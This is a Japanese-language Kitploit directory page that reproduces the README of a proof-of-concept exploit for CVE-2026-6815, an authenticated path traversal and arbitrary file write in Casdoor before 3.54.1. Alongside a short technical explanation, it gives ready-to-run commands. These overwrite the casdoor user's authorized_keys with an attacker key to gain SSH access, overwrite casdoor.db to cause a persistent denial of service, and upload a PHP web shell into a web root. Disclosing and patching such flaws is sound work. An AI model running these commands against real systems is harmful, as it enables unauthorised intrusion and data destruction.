Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-6815 — Casdoor <3.54.1の認証済みパストラバーサルおよび任意ファイル書き込みPoCエクスプロイト。SSHキーインジェクション、Webシェルアップロード、またはデータベース破損による永続的DoSを介したRCEを可能にします。 | Kitploit
ツール/GitHubGitHub/danilo-dellorco/cve-2026-6815
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubdanilo-dellorco/cve-2026-6815

CVE-2026-6815

Casdoor <3.54.1の認証済みパストラバーサルおよび任意ファイル書き込みPoCエクスプロイト。SSHキーインジェクション、Webシェルアップロード、またはデータベース破損による永続的DoSを介したRCEを可能にします。

リポジトリを見る
2103ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-6815 PoC/Exploit: Casdoor <3.54.1 パストラバーサルおよび任意ファイル書き込み(認証済み)

このリポジトリは、Casdoor における任意ファイル書き込みおよびパストラバーサルの脆弱性 CVE-2026-6815 の Proof of Concept (PoC) エクスプロイトです。

この脆弱性はバージョン 3.54.1 で 修正 されました。

Requirements

攻撃者は、Casdoor インスタンスに対して管理者権限、またはストレージプロバイダを作成・編集できる同等のユーザーとして認証されている必要があります。

Impact

  • リモートコード実行 (RCE): .ssh/authorized_keys、crontab、Webルートなどの機密性の高い場所に書き込むことで実現。
  • サービス拒否 (DoS): アプリケーションデータベース (casdoor.db) やコアバイナリを任意のファイルで上書きし、アプリケーションを即座に停止させる。

Technical Details

Casdoor は管理者がストレージプロバイダを設定できるようにしています。Local File System プロバイダは、リソースアップロード時に pathPrefix 設定および fullFilePath パラメータを適切にサニタイズできません。

ディレクトリトラバーサルシーケンス (../) を使用することで、認証された管理者は専用のストレージディレクトリをエスケープし、Casdoor プロセスに権限がある任意の場所にファイルを書き込むことができます。

脆弱性は、以下の場所における不十分なパス検証に起因します:

  • object/provider.go: 作成/更新時に pathPrefix に対する検証がない。
  • storage/local_file_system.go: GetFullPath メソッドは、解決されたパスが意図されたサンドボックス内に留まっているかどうかを確認しない。

Usage

  1. 依存関係をインストール:

    pip install -r requirements.txt
    
  2. エクスプロイトを実行:

    python3 poc.py --url http://target:8000 --file local_file --rpath /home/casdoor/new_remote_file
    

Usage Examples

1. RCEのためのSSH鍵インジェクション

攻撃者が管理する公開鍵を casdoor ユーザーの authorized_keys ファイルに書き込み、SSHアクセスを獲得します。

SSH鍵を生成:

ssh-keygen -f casdoor_rce

生成した公開鍵で authorized_keys を上書き:

python3 poc.py --url http://target:8000 --usr admin --psw 123 --file casdoor_rce.pub --rpath /home/casdoor/.ssh/authorized_keys

秘密鍵を使用してリモートホストでSSHシェルを取得:

ssh -i ./casdoor_rce casdoor@target

2. 持続的なDoS(データベース破壊)

アプリケーションのローカルデータベースファイル(例:casdoor.db)を上書きしてサービス拒否を引き起こします。

python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db

3. Webシェルアップロード(セカンダリWebルート)

サーバーが同じファイルシステム上でセカンダリWebサーバー(例:Apache/Nginx)をホストしている場合、そのドキュメントルートにWebシェルを書き込みます。

python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php

4. カスタム組織とアプリケーション

特定の組織およびアプリケーション(デフォルトの built-in および app-built-in 以外)の管理者資格情報がある場合は、--orgname および --appname を使用して指定します。

python3 poc.py --url http://target:8000 --usr custom_admin --psw P@ssw0rd --orgname my-org --appname my-app --file local_file.txt --rpath /tmp/pwned.txt

References

  • CERT/CC Vulnerability Note VU#937808
  • CVE-2026-6815 on CVE.org
  • Red Hat Security Advisory: CVE-2026-6815

Disclaimer

このソフトウェアは教育および許可されたセキュリティテストの目的のみに使用されます。作者はこの情報の誤用について一切の責任を負いません。

Author

脆弱性を発見し、PoCを開発したのは Danilo Dell'Orco (sixpain) です。

ツールをダウンロード